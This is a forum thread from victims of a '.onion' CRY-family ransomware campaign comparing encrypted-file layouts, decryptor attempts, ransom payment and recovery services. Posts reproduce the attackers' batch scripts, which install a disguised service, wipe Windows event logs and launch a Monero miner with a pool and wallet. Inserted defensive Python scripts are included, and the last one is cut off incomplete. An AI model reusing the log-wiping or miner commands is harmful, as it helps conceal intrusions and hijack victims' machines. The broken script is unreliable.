mclaugb (Posted May 9, 2017):

I have the exe's if you are interested. I'm not going to post them for everyone, but I'll send them to individuals.
matwachich (Posted May 9, 2017):

> 3 minutes ago, mclaugb said: I have the exe's if you are interested. I'm not going to post them for everyone, but I'll send them to individuals.

I'm interested! Please upload them and PM me the links. Thanks! Does the Emsisoft team have the exes?
Sarah W (Posted May 9, 2017):

> 2 hours ago, ganymede said: I think this guy might have the actual executable. On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs:
>
> winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x Workstationt C:\Windows
>
> Maybe that long nonsense string has something to do with the key?

That's a cryptocoin miner. The criminals running this campaign drop these miners, which take up system resources and power in order to mine these coins for them, so it's not something you want on your system. Emsisoft Anti-Malware should be able to detect such threats, and if our product is of help then please consider buying it (the price is discounted and we protect against ransomware such as this one).

Some other advice is that investing in a good backup procedure is very important and well worth it. I would suggest having two or more backups, at least one disconnected. You will also need to secure RDP with a strong password if you continue to use RDP, as this is how the criminals enter the system.

We are still looking into this to see if there is anything we can do to help you decrypt.

Regards,
Sarah
GraphX (Posted May 9, 2017):

I very much hope for your help; the same 36-byte difference as in all previous posts here, and the .onion extension. Seems like a big deal...
mclaugb (Posted May 10, 2017):

Here is the Windows script mine was running.

run.bat:

    echo Havefun
    REM registers run64.bat as a service named Windows32_Update and starts it
    C:\Windows\dell\svchost.exe install "Windows32_Update" "C:\Windows\dell\run64.bat"
    C:\Windows\dell\svchost.exe start Windows32_Update
    REM clears the PowerShell, Security and System event logs
    wevtutil cl "windows powershell"
    wevtutil cl "security"
    wevtutil cl "system"
    echo Havefun

run64.bat:

    REM miner pointed at a Monero pool; -u is the wallet address the proceeds go to
    Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1

Then repeated calls to the svchost.exe.
GeorgeB (Posted May 10, 2017):

> 9 hours ago, ganymede said: I think this guy might have the actual executable. [...] Maybe that long nonsense string has something to do with the key?

What are the last 35 bytes at the end of the encrypted files (in my case it is 31 of 00 and EF 52 5E A0)?
ganymede (Posted May 10, 2017):

> On 5/8/2017 at 7:14 AM, ganymede said: My last 4 in each file are 35 F6 5C 01.
mclaugb (Posted May 11, 2017):

I finally gave in to the scam as our business did not have a backup and had some time-sensitive materials. EMSISOFT--it would be nice if you could communicate with people in the forum a little more frequently and indicate a timeline, how we can help, etc. I find it a little frustrating that few if any of your team are even on these forums. Maybe we're too incapable of helping you but some updating would be nice.

Anyway, I saved all of the decrypt exe files locally that the criminals gave me, my user number (number in all the filenames), and a >256 character keystring that the hacker website provided me. The ransom allows you to download the decrypter exe for three different filetype extensions. Mine are a bolal4nd.onion type so I used that exe. The hardest thing was actually buying bitcoins and getting that done reasonably quickly. I went to a bitcoin ATM and put in cash and set up a bitcoin wallet on Coinbase. Cost about $275 bucks all in all, but I had put 20 hours into this, a new hard drive, etc.

For the record, the criminals' tool did not initially decrypt the files correctly--it failed giving an error. But there is a little checkbox "ignore checksum" that when clicked says "may ruin the files". I made a copy of some files I needed and pointed the decrypter at this "folder" to test whether it would damage the files. The files opened near perfectly (some minor property information was lost), but it worked just fine and I have my files back. Now I have it running on the whole hard drive. The criminals also have a support box for you to send them files and your email address if the decrypt does not work for you.

I'm not advocating for the path that we chose, but the good guys at EMSISOFT could do more to communicate more frequently to allow users to help them. I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine.

EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.
matwachich (Posted May 11, 2017):

I am interested!
ganymede (Posted May 11, 2017):

Just an opinion here, but the folks at Emsisoft are doing what they can to provide a FREE service to restore people's files, and for that no one has any reasonable ground on which to complain. I too have wondered as to their status, but with updates like Sarah's, I know that it's not being ignored. How much could they possibly share on a topic that most would likely not understand?

For my own situation, I have reached out to a specialist recovery service, and they claim to be able to restore my files for ~$2000, but I am waiting for the folks at Emsisoft because I'm confident they'll come up with something in a reasonable amount of time. And also because no matter the cost to my company, I refuse to negotiate with terrorists. Meanwhile I have been redoing lost work as needed. All in all, still probably less cost than the $2k being quoted.

If Fabian and the rest of Emsisoft's brain trust can fix this, you better believe I'm buying their product!
bruticus0 (Posted May 11, 2017):

Dude. Take your business and complain to Kaspersky, Norton, or Bitdefender. See how many replies you get there about their decryptors. Timeline? All of us...every single one is here just for the "chance" that we might be able to get our files back. Everyone on this thread is looking for a handout. We haven't had to provide an Emsisoft license key, or sign up for anything to access any of the decryptors they have come out with. Your files are lost and there's one guy. ONE guy in this whole world that's actually trying to help you out. And you want a timeline?

1. You left your computers at risk in the first place.
2. You weren't even running the anti-malware they sell to make a living that would have prevented the infection.
3. Now you want them to contact you, instead of you just uploading the files offsite or to BleepingComputer, then emailing Emsisoft with the links?

Guys, we're only mooching off their good graces here. RANT OVER

Thanks for the update Sarah, we appreciate it.
mclaugb (Posted May 11, 2017):

Dear all, I couldn't agree more with your comments about not really having the right to complain. I have complained to the other companies as well, namely McAfee, as their product totally failed and was disabled by this tool altogether. Sarah posting her note was encouraging, but it was the first indication at all on the forums that there was any hope. I guess I was a little surprised that nobody from the company reached out to ask for any of the executables, file logs, etc. I guess I inferred from that that either they didn't care, were not working on it, or already had them and did not need them. So Sarah's note saying they were working on it was definitely encouraging!

Lots of companies make free tools in order to get their brand and their name out such that their products will be purchased. I for example am considering buying site licenses for Emsisoft products. So "free" tools do ultimately tie into a business model. Good for Emsisoft.

Again, if anyone wants encrypted files decrypted, keys, decrypting engine--do let me know if I can benefit the community through the ransom I paid. Thank you Emsisoft again for your efforts.

Bryan
CKWS (Posted May 11, 2017):

Hi Brian and the rest of the victims out there!

Have had some time today and took a look at the "unlock.exe" file (namely the one from here: https://www.dropbox.com/s/rdiqwrp4zarrfzd/unlock_gebdp3k7bolalnd4.onion.zip?dl=0 ) with a debugger (OllyDbg) and a decompiler (IDR, kb2014 knowledge base). I'm not THAT skilled with such things but I think I found two hints that maybe can be used by professionals to maybe speed up things a little.

First one: Address of the "Unlock One" Button Click Event: 5CBD64

Second one: Private Key may be "BqdmQNCK1v8acZ12"

Would be great if someone were able to check what happens at this Click Event and maybe see how the encrypt/decrypt routine actually works.
Sarah W (Posted May 11, 2017):

> 20 hours ago, mclaugb said: I finally gave in to the scam as our business did not have a backup and had some time-sensitive materials. [...] I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.

A few things. First of all, we are a 30-person team, hardly the scale of most antivirus vendors with 500+ employees. This means that many of us have to work multiple roles, and we offer the decrypters for free, meaning that we don't directly profit from them (however, we appreciate anyone who considers our products based on them), so they have to be balanced around the other work we have to do.

Giving a timeline would not be a good idea; we rarely know how long it will take. We would not like to give a set time and then fail to meet it because we came across a problem we didn't expect.

In the end, we do understand if you have to pay the ransom; however, we try to warn against doing so as this is what makes ransomware profitable. We already have the malware file, so whilst you can upload the file to a post, it's not necessary to do so.

I do admit communication could be better and more regular, but in general, if we have something new we will update. I will try to update more now.

I do have one suggestion whilst people are waiting, and that is using file/data recovery tools. I don't know how effective this will be but it may provide some results for some people.

Regards,
Sarah
matwachich (Posted May 11, 2017):

I'm currently working on picture recovery. The technique already worked for me. I'm developing a tool to apply it on many files at once. So if you're going to pay only for pics, wait a moment. PM me if you want more info.
Win32.DN (Posted May 12, 2017):

My friend became a victim and I reversed the uploaded "unlock.exe" yesterday. The 36 (0x24) bytes variant is actually based on Cry9. I already understand (I hope) how the unlocker decrypts the files. The problem is factoring the AES128 key (and the 0x1000+ bytes additional table), which looks to be different per victim. Maybe Fabian knows better about this part (or he is stuck at the same point). I will look more when I have more time but don't expect good news from me.
GeorgeB (Posted May 12, 2017):

> On 5/11/2017 at 4:13 AM, mclaugb said: I finally gave in to the scam as our business did not have a backup and had some time-sensitive materials. [...] I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.

Dear Mclaugb, please share the unlocker, the key provided and a sample of encrypted files. I want to try to disassemble the unlocker. Thanks!
GeorgeB (Posted May 12, 2017):

> 9 hours ago, Win32.DN said: My friend became a victim and I reversed the uploaded "unlock.exe" yesterday. The 36 (0x24) bytes variant is actually based on Cry9. [...] I will look more when I have more time but don't expect good news from me.

Nice work. Let's name this variant CRY36. Please confirm that this variant encrypts files in 32-byte blocks and only the first 320 blocks of 32 bytes (10k). Please share any knowledge about how this variant works. Thanks
Cookie (Posted May 12, 2017):

Hello to all, my computer got infected on 10 May 2017. All files were encrypted as filename.extension.xxxxxx.id_xxxxxx_fgb45ft3pqamyji7.onion. The ID Ransomware site identified it as CRY9. I also tested the decryptor from Emsisoft but it says the file must be 68 bytes different. My example file is about 20MB and the difference to the encrypted one is 61 bytes. Maybe I am doing something wrong - or it is not CRY9? I have a backup but it's from several months ago. I don't know what to do now... Thanks for the help and good job in the fight with the hackers.
bruticus0 (Posted May 12, 2017):

> 9 hours ago, Cookie said: Hello to all, my computer got infected on 10 May 2017. All files were encrypted as filename.extension.xxxxxx.id_xxxxxx_fgb45ft3pqamyji7.onion. [...] I don't know what to do now... Thanks for the help and good job in the fight with the hackers.

The last decryptor for Cry that Emsi made is here. I think it runs for most of us, it just doesn't find the key file. So far, our files have had a 36-byte difference. Like they said above, 32 bytes at the beginning of the file, then 4 bytes at the end I think.

Best thing to do is get rid of, or quarantine, the infection if you can first. (If you have the executable infection quarantined, you can then upload it.) Emsisoft has an Emergency Kit somewhere around here that does really well. Then you can back up the encrypted files somewhere and get your C drive back to operating normally. Then plug up any security holes in remote desktop, update your Windows, and get a good anti-malware installed. There's a few free anti-ransomware programs you can tack on in addition to antivirus/malware. Malwarebytes makes one and I think Cybereason does too. Bitdefender has one, but I think it's hard to find. And disable or secure your Remote Desktop and Remote Assistance connections.

You can upload a file pair here if you want. Wouldn't hurt. A file pair is an original file and its encrypted counterpart. You should be able to find an original somewhere. Program readmes are usually the same. And .exe files of the same version can be downloaded again.

Then just check back here for any new updates. If they release a new decryptor anytime in the future, you'll have your backed-up files to use it with.
Cookie (Posted May 12, 2017):

> 11 hours ago, bruticus0 said: The last decryptor for Cry that Emsi made is here. I think it runs for most of us, it just doesn't find the key file. So far, our files have had a 36-byte difference. [...] If they release a new decryptor anytime in the future, you'll have your backed-up files to use it with.

Thank you for your answer. I had an old copy of some files, but the difference between the original and infected versions of my files is about 61 bytes. It is not 68 bytes and not 36 bytes either. I don't know where the problem is... Maybe it is another ransomware?
matwachich (Posted May 12, 2017):

Yes, it must be another variant... Try this to know which ransomware it is. By the way, the 36 bytes are all appended at the end of the file. In all my files, it is: [1 random byte][31 null bytes][4 fixed bytes]
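As an added illustration (not code from the thread, from Emsisoft, or from the ransomware's tooling), here is a Python triage script that checks an original/encrypted file pair against the layout the thread describes: a 36-byte trailer of [1 random byte][31 null bytes][4 fixed bytes], and GeorgeB's question of whether only the first 320 blocks of 32 bytes are rewritten. The sample pair is constructed; the XOR used to make the prefix differ is a stand-in, not the real cipher, and the fixed tail 35 F6 5C 01 is the one ganymede reported.

```python
"""Triage a file pair against the CRY36 layout reported in the thread."""
from dataclasses import dataclass
from typing import Optional, Tuple

TRAILER_LEN = 36          # bytes appended to every encrypted file
NULL_RUN = 31             # null bytes between the random byte and the fixed tail
BLOCK = 32                # encryption block size discussed in the thread
MAX_ENC_BLOCKS = 320      # 320 * 32 = 10240 bytes, the "10k" in the thread


@dataclass
class PairReport:
    size_diff: int                  # len(encrypted) - len(original)
    trailer_ok: bool                # trailer has the [1][31 nulls][4] shape
    random_byte: Optional[int]      # first trailer byte, if trailer_ok
    fixed_tail: Optional[bytes]     # last 4 trailer bytes, if trailer_ok
    encrypted_bytes: int            # rewritten prefix length, whole 32-byte blocks
    tail_intact: bool               # everything after the prefix equals the original
    fully_encrypted: bool           # the prefix covers the whole body (matwachich's finding)


def trailer_shape_ok(trailer: bytes) -> bool:
    """True if the trailer looks like [1 byte][31 x 00][4 bytes]."""
    return len(trailer) == TRAILER_LEN and trailer[1:1 + NULL_RUN] == b"\x00" * NULL_RUN


def rewritten_prefix_len(original: bytes, body: bytes) -> int:
    """Offset 0 up to the last differing byte, rounded up to a 32-byte block.

    A cipher block whose last bytes happen to equal the plaintext would be
    undercounted here, so treat the result as a lower bound.
    """
    last_diff = -1
    for i in range(min(len(original), len(body))):
        if original[i] != body[i]:
            last_diff = i
    if last_diff < 0:
        return 0
    return (last_diff // BLOCK + 1) * BLOCK


def analyze_pair(original: bytes, encrypted: bytes) -> PairReport:
    """Compare an original file with its encrypted counterpart."""
    size_diff = len(encrypted) - len(original)
    trailer_ok, random_byte, fixed_tail = False, None, None
    body = encrypted
    if size_diff == TRAILER_LEN:
        trailer, body = encrypted[-TRAILER_LEN:], encrypted[:-TRAILER_LEN]
        trailer_ok = trailer_shape_ok(trailer)
        if trailer_ok:
            random_byte, fixed_tail = trailer[0], trailer[-4:]
    prefix = rewritten_prefix_len(original, body)
    tail_intact = len(body) == len(original) and body[prefix:] == original[prefix:]
    return PairReport(size_diff, trailer_ok, random_byte, fixed_tail,
                      prefix, tail_intact, prefix >= len(original))


def make_sample(n: int = 20000, enc_len: int = MAX_ENC_BLOCKS * BLOCK) -> Tuple[bytes, bytes]:
    """Constructed pair: the prefix is XORed with 0x5A as a stand-in for the
    unknown cipher (every byte changes), the rest is left as-is, and the trailer
    uses the fixed tail 35 F6 5C 01 quoted in the thread."""
    original = bytes((i * 7 + 3) & 0xFF for i in range(n))
    prefix = bytes(b ^ 0x5A for b in original[:enc_len])
    trailer = b"\x7a" + b"\x00" * NULL_RUN + b"\x35\xf6\x5c\x01"
    return original, prefix + original[enc_len:] + trailer


if __name__ == "__main__":
    orig, enc = make_sample()
    print("CRY36-shaped pair:", analyze_pair(orig, enc))
    orig2, enc2 = make_sample(20000, 20000)
    print("fully encrypted body:", analyze_pair(orig2, enc2))
    # 61-byte difference like Cookie's files: does not fit the 36-byte layout
    print("61-byte difference:", analyze_pair(orig, orig + b"\x00" * 61))
```

A pair from a different variant shows up as trailer_ok False and tail_intact False, which is the quick way to tell that a decryptor built for this layout will not apply.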
bruticus0 (Posted May 12, 2017):

I was actually wrong above. Should try to quarantine the infection. If they have the .exe, they can try to make a decryptor a little easier. So if you do have a new variant of this, that exe would prolly be important in the process. Sorry.

Good job in figuring that out matwa. Maybe that one random byte has something to do with the encryption of the file. With everyone's info, we know a lot more than we did a week or two ago.

Also, just in case you didn't know: these acts are cyber crimes/terrorism, whatever you wanna call it. You can report it to the authorities. In the US you can file a complaint with the IC3 here. The more people that report, the more it'll draw attention to the issue and let 'em try and do something about it.
matwachich (Posted May 13, 2017):

The c:\windows\dell\svchost.exe is only this. I don't have (yet) the real virus executable. Can anyone provide it?
matwachich (Posted May 14, 2017):

I have just discovered a terrible thing!!! Some files are entirely encrypted!!!!!
mclaugb (Posted May 14, 2017):

Did you get the 15321.exe file and the two batch files? The svchost.exe was being called by that batch file every 2 minutes in my firewall logs once the virus hit. I'm going to upload a packet of files tomorrow: the decryptor, pre-decrypted files, and post-decrypted files. They are mostly ASCII files so they are very easy to read with a hex editor. Maybe having one solution to the encryption will help folks generate a decryptor. There is a 4-digit number the ransomware generates when you log in to pay. That likely is used in the unlock key.
Reynald0 (Posted May 15, 2017):

Hi guys, I have the same problem. Looks like this topic has good information... Please, if someone can share the tool to decrypt files. If it can help, here is a sample of my files (original and encrypted): SAMPLE.zip
AL3918 (Posted May 15, 2017):

I am a drafter in California. My computer was infected with the Cry9 *.onion encryption. I went on every forum... researching for days if anyone had any solutions... and was led here and have seen other people have complained about a similar *.onion encryption. This forum helped me to reboot to safe mode so I could run an anti-malware sweep. Thank you Emsisoft.

I am just a regular person... a computer drafter whose CAD files had all been encrypted with the onion encryption. Thousands of drafting hours potentially lost. I am no computer programmer or IT expert. This forum was very informative, at least helping me understand the nature and severity of this nasty encryption. Over the years I've dealt with different kinds of malware... Trojan Vundo with the biohazard icon on the desktop, that one virus that converted my files to hidden types, etc. Typically I could jump on a forum and within a couple hours research... someone had a solution. This Cry9 variant truly caused severe stress to my life, my coworkers, and our families.

I want to share how I was able to recover all my files... all 222 GB of it. I hired a company called Proven Data Recovery. It took about 4 days for them to decrypt the files. I was unsure at first since one data recovery company told me it was going to cost $20k to decrypt. I called a couple others... by chance found Proven Data Recovery and their fee was much more reasonable. So for those who have files encrypted with the *.onion Cry9, Proven Data Recovery helped me. Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return that our files would be decrypted.

This whole ordeal has taught me a couple things... get a cloud backup and back up data at least every week to an external hard drive... keep the operating software/updates up to date.
bruticus0 (Posted May 15, 2017):

Thanks for the input Al, we appreciate it. Even if it costs some money, having another option open to recover your files is a good thing.

On the subject of backups, I've found I kind of like the idea behind Macrium Reflect. It's expensive for the paid version, but the free version does what you need too without any bells and whistles. There's a two-step thing. First you can make a backup that is an image of the drive itself. The image file is also compressed, which saves you some space. You can do one-time backups with the free version, then put that backup on an external device you keep offline, or upload it yourself to the cloud somewhere.

The second step you do is under "Other Tasks". It's called "Rescue Media". What this does is put Windows Pocket Edition (PE), along with Macrium, onto a bootable USB or CD. This can be stored offline as well. So to restore from a backup, take the USB, load it up, and it will start a Windows PE session on your computer. Then get your backup image from the cloud or wherever you kept it. Plug it in and direct Macrium to look there and you can choose that image. It will then start to restore your backup. It's a really simple process to do.

I did a restore on my new OS install and everything went ok except for one or two Asus drivers. They didn't really like being restored that way. Other than that, it's a very easy backup plan I think. If you have the paid version of it, you can do backup schedules: Grandfather, Incremental, Differential, and a Full Synthetic type backup.
Geng (Posted May 15, 2017):

@AL3918 Thanks for letting us know. Can you let us know how the data recovery process went? Did you have to send ALL 222GB of your files to them? Or did they send you a decrypter?
kygiacomo (Posted May 16, 2017):

> On 5/10/2017 at 9:13 PM, mclaugb said: I finally gave in to the scam as our business did not have a backup and had some time-sensitive materials. [...] I now have the VIRUS exe files, unencrypted files, encrypted files, the exe decrypting engine, and at least one key for the engine. EMSISOFT--SEND ME A MESSAGE IF YOU ARE INTERESTED.

So you're mad at Emsi for your own mistake? I find that a little odd to say the least. People like you are what keeps these terrorists in business. I have Emsisoft Internet Security and I can honestly say that I have never had a virus, malware or ransomware.
ganymede (Posted May 16, 2017):

> 4 hours ago, AL3918 said: I want to share how I was able to recover all my files... all 222 GB of it. I hired a company called Proven Data Recovery. It took about 4 days for them to decrypt the files. [...] Maybe there is another way to deal directly with the terrorists but my company did not feel comfortable doing that and possibly giving money via bitcoin with no proven return that our files would be decrypted.

Ahh, this was the company I reached out to as well. They quoted me ~$1900 for 5-7 day service. I opted not to pursue it in the hopes that Emsi will come out with something in the near future, but if I need the data sooner, it's good to know now that they're a sure thing. Thanks for the info.
kygiacomo (Posted May 16, 2017):

How did you guys get the infection in the first place? Did you click a link in an email?
Kevin Zoll (Posted May 16, 2017):

Any decrypter and encryption key given to one user will not work for another user. Encryption keys are system specific.
ganymede (Posted May 16, 2017)
Most commonly it's been brute force entry via Remote Desktop, though I've been hearing in the news lately that Office 365 and some other feature Windows comes with were also points of entry. I can't remember the name of the other thing off the top of my head, but apparently it was a serious enough vulnerability that Microsoft released updates for old OSes as far back as XP.
Kevin Zoll (Posted May 16, 2017)
WannaCry exploits an unpatched vulnerability in the SMBv1 protocol on unpatched Windows systems. If your system is up to date then it is not vulnerable. MS has released a patch for Win XP, Server 2003, and Win 8 to patch SMBv1 on those no longer supported operating systems.
mclaugb (Posted May 16, 2017)
Hi Folks, I'm not sure if these files will help, but I've posted all of the virus files, ID, decryption key (provided by the scammers), etc. I'm hopeful that this will help those with the expertise to save others time and money. But it was a horrible experience with CRY128 which I hope will guide others in how the scam can be cracked. I had no backup and was in a time pinch at our company, so I could not wait it out for a crack. I also use R-soft tools for recovery and found some files, but unfortunately R-soft cannot recognize common engineering formatted files, so it couldn't find those.

First I found the virus files wreaking havoc by looking at Endpoint Security logs and Windows System / App logs. The smoking gun appeared to be pointed at a c:\windows\dell folder containing some batch files. Also a file 15321.exe kept appearing in my c:\ directory (all of these files are zipped in folder VIRUS_FILES). I password protected the ZIP file with the word "infected" so that no accidents happen.

In a pinch, I had to pay the ransom. Using the Tor browser, the ransom page asks you to enter your FILE ID. In my case, all files were named "*1638578921*.onion". You can play with the attached encrypted files and the decryptor. The Tor Browser pulls up a "Decrypt panel". The ID KEY must be typed in (in my case 1638578921). There is then a "Show code" box which currently displays "35352" with a blank box. You must re-enter the code in that box. (Presumably this is used in some way to generate the key.) You then press enter and it provides you with an address to send the bitcoins to. Note, the number was the same when I visited the webpage multiple times within a 24 hour period, but I think it has changed. Once paid, it provides you three files to download. (I have attached all three versions in the zip file.)

I have attached the instruction page (after you pay) and the "decrypt" password for all of the decryption software. Your [...] the decryptor does not work, as you will see, without checking the "ignore checksum" box. Then it decrypts the files just fine. Anyway, I hope this helps. Bryan

Attachments: CRY128_FILES_UNLOCK.zip, README.TXT.txt
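Two facts from the posts above are useful for triage before anyone decides whether to pay, wait or carve: every encrypted file carries the victim ID in its name (the "*1638578921*.onion" pattern mclaugb had to type into the Tor panel), and earlier posters report each encrypted file being exactly 36 bytes larger than the original. The script below is an added example, not code posted in this thread or by Emsisoft. It pulls the ID and the onion label out of a folder of encrypted files and, where a clean copy of a file still exists (a backup, or the test copies mclaugb made), measures the size overhead. The exact name layout is not documented in the thread, so the regex relies only on a run of digits and the final label before ".onion"; the ".id-" marker in the constructed sample names is an assumption. The sample files are built in a temporary directory and the "ciphertext" is an XOR stand-in of the right length, not the real cipher.

```python
"""Triage of a CRY128-style infection: victim ID from the encrypted file
names, and the per-file size overhead.

Added example, not code from the thread or from Emsisoft. Name layout,
the ".id-" marker and the sample files are assumptions/constructions.
"""
import re
import tempfile
from collections import Counter
from pathlib import Path
from typing import Dict, List, Optional, Tuple

ENCRYPTED_NAME = re.compile(
    r"^(?P<orig>.+?)"                     # original file name
    r"[._-](?:id[-_]?)?"                  # separator and optional "id" marker (assumed)
    r"(?P<id>\d{6,})"                     # victim ID: a run of digits
    r"[._-](?P<host>[a-z0-9]+)\.onion$",  # onion label used as the extension
    re.IGNORECASE,
)


def parse_encrypted_name(name: str) -> Optional[Tuple[str, str, str]]:
    """Return (original name, victim ID, onion label), or None if the name does not match."""
    m = ENCRYPTED_NAME.match(name)
    if m is None:
        return None
    return m.group("orig"), m.group("id"), m.group("host").lower()


def triage(encrypted_dir: Path, clean_dir: Optional[Path] = None) -> dict:
    """Count victim IDs and onion labels; pair each file with a clean copy if one exists."""
    ids: Counter = Counter()
    hosts: Counter = Counter()
    deltas: Dict[str, Optional[int]] = {}
    unparsed: List[str] = []
    for path in sorted(encrypted_dir.iterdir()):
        if not path.is_file():
            continue
        parsed = parse_encrypted_name(path.name)
        if parsed is None:
            if path.suffix.lower() == ".onion":
                unparsed.append(path.name)  # .onion file the regex could not read
            continue
        orig, victim_id, host = parsed
        ids[victim_id] += 1
        hosts[host] += 1
        delta = None
        if clean_dir is not None and (clean_dir / orig).is_file():
            delta = path.stat().st_size - (clean_dir / orig).stat().st_size
        deltas[path.name] = delta
    return {"ids": dict(ids), "hosts": dict(hosts), "deltas": deltas, "unparsed": unparsed}


def consistent_overhead(report: dict) -> Optional[int]:
    """The single size overhead shared by every paired file, or None if they disagree."""
    seen = {d for d in report["deltas"].values() if d is not None}
    return seen.pop() if len(seen) == 1 else None


def build_sample(root: Path, overhead: int = 36) -> Tuple[Path, Path]:
    """Constructed sample: three clean files and their fake encrypted twins."""
    clean, enc = root / "clean", root / "encrypted"
    clean.mkdir()
    enc.mkdir()
    originals = {
        "report.docx": b"PK\x03\x04" + b"A" * 2000,
        "Drawing1.dwg": b"AC1027" + b"B" * 5000,
        "notes.txt": b"hello\n",
    }
    for name, body in originals.items():
        (clean / name).write_bytes(body)
        # Stand-in for the ciphertext: same length plus the overhead; NOT the real cipher.
        fake_ct = bytes(b ^ 0x5A for b in body) + b"\x00" * overhead
        (enc / f"{name}.id-1638578921_bolal4nd.onion").write_bytes(fake_ct)
    (enc / "README.TXT.txt").write_bytes(b"ransom note\n")  # ignored: not a .onion file
    return enc, clean


def run_demo() -> dict:
    """Build the sample in a temp dir, triage it, and return the report with the overhead."""
    with tempfile.TemporaryDirectory() as tmp:
        enc, clean = build_sample(Path(tmp))
        report = triage(enc, clean)
        report["overhead"] = consistent_overhead(report)
        return report


if __name__ == "__main__":
    r = run_demo()
    print("victim IDs:", r["ids"])
    print("onion labels:", r["hosts"])
    print("per-file overhead:", r["overhead"], "bytes")
```

Point it at the real folders (`triage(Path(r"D:\encrypted"), Path(r"E:\backup"))`) and a single ID with a single onion label confirms one infection, while a constant overhead across every pair tells the people working on a decrypter that the extra bytes are a fixed-size per-file blob rather than padding that varies with the plaintext.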
MARIO RENNO (Posted May 16, 2017)
I can't download the files, Bryan. Could you send them to me at [email protected]?
Geng (Posted May 16, 2017)
@mclaugb Did you check if the decrypter .exe files contained any viruses? Many people reported they do.
Win32.DN (Posted May 16, 2017)
Unfortunately, a legit decryptor does not help with the difficult part. The difficult thing is factoring the "PRIVATEKEY", which is different per user.
CKWS (Posted May 16, 2017)
10 hours ago, AL3918 said: [quoted above]

Would be interesting to know how this company did it. Do they have a decrypter, or do they just pay the ransom (which is less than what they receive from you) and keep the rest? If they have a working decrypter, it would be worth considering their service. If they only act as a "man in the middle" and the criminals still get paid, it is worthless.
GeorgeB (Posted May 16, 2017)
7 hours ago, mclaugb said: [quoted above]

Please send these files. I cannot download from the original post. Thanks.
Nova (Posted May 16, 2017)
Hi all. Has anyone been able to solve cry36? The encrypted file name is fgb45ft3pqamyji7.onion. Thanks.
bruticus0 (Posted May 16, 2017)
16 minutes ago, Nova said: Hi all. Has anyone been able to solve cry36? The encrypted file name is fgb45ft3pqamyji7.onion. Thanks.

No, not yet, Nova. You will probably see it here when they do, though.
AL3918 (Posted May 16, 2017)
CKWS, I do not know how they decrypted. After I gave my credit card info to them, I took a deep breath and hoped everything would turn out OK. I received an email from Proven Data that gave instructions on how to set up a remote connection for their technician. I could see the technician log in remotely (the screen turned black) and I could see the mouse pointer moving around, going through my files. I didn't stare at the server the whole time; it was on a Friday, and when I came into work on Monday the pointer was still moving around. I don't know if one technician worked on my server or multiple. The technician had access to the ransom note, so it is plausible they directly contacted them, or they were able to decrypt on their own. I'm not sure. I don't like the idea of a hacker getting some kind of payment, but at the same time I had files that represented thousands of hours of AutoCAD drafting that were unusable. It was not "worthless" to me, since all my data was recovered, and even though a handful of my clients got pissed off by the delay in our drafting production, if I couldn't get all my files back this most likely could have closed down my company.
Kevin Zoll (Posted May 16, 2017)
@AL3918 @CKWS Data Recovery companies are not decrypting encrypted files. Companies of this nature use forensic data recovery methods that recover the original unencrypted file from the hard drive. And yes, it can be quite expensive.
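The recovery Kevin Zoll describes does not touch the ciphertext at all: when ransomware writes the encrypted copy as a new file and deletes the plaintext, the original bytes usually stay in unallocated space until something overwrites them, and a signature-based carver can pull them back out. The block below is an added example of that technique, not Proven Data Recovery's process (which the thread does not describe) and not Emsisoft code. The PNG, JPEG and PDF header/footer signatures are the real ones; DWG files are recognised by the "AC10xx" version string they start with and, since DWG has no fixed footer, are reported with a start offset only. The disk image is constructed in memory so the example runs offline; note that the "encrypted" region in it produces no hit, which is exactly why carving recovers plaintext but cannot help with the encrypted copies.

```python
"""Signature-based file carving over a raw disk image.

Added example, not code from the thread, from Emsisoft or from any recovery
company. Signatures are real; the disk image is constructed below.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SECTOR = 512
FOOTER_WINDOW = 50 * 1024 * 1024  # how far past a header to look for its footer


@dataclass
class Carved:
    kind: str
    start: int
    end: Optional[int]  # None when the format has no footer to bound the file
    data: bytes


# kind -> (header regex, footer bytes or None)
SIGNATURES = {
    "png":  (re.compile(rb"\x89PNG\r\n\x1a\n"), b"IEND\xaeB`\x82"),
    "jpeg": (re.compile(rb"\xff\xd8\xff[\xe0-\xef]"), b"\xff\xd9"),
    "pdf":  (re.compile(rb"%PDF-1\.[0-7]"), b"%%EOF"),
    "dwg":  (re.compile(rb"AC10\d\d"), None),  # AutoCAD version string, e.g. AC1027
}


def carve(image: bytes) -> List[Carved]:
    """Scan the whole image for every known header; bound each hit by its footer."""
    found: List[Carved] = []
    for kind, (header, footer) in SIGNATURES.items():
        for m in header.finditer(image):
            start = m.start()
            if footer is None:
                found.append(Carved(kind, start, None, b""))  # header-only format
                continue
            window_end = min(len(image), start + FOOTER_WINDOW)
            end = image.find(footer, m.end(), window_end)
            if end == -1:
                continue  # header with no footer in range: truncated or overwritten
            end += len(footer)
            found.append(Carved(kind, start, end, image[start:end]))
    return sorted(found, key=lambda c: c.start)


def summarize(hits: List[Carved]) -> List[Tuple[str, int, Optional[int]]]:
    """(kind, start offset, end offset or None) for each carved object."""
    return [(h.kind, h.start, h.end) for h in hits]


def build_sample_image() -> bytes:
    """Constructed 7-sector image: PDF, blank, PNG, a 2-sector 'encrypted' blob, DWG, blank."""
    def pad(b: bytes) -> bytes:  # pad a blob to a whole number of sectors
        return b + b"\x00" * (-len(b) % SECTOR)

    blank = b"\x00" * SECTOR
    pdf = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n1 0 obj<<>>endobj\ntrailer<<>>\n%%EOF"
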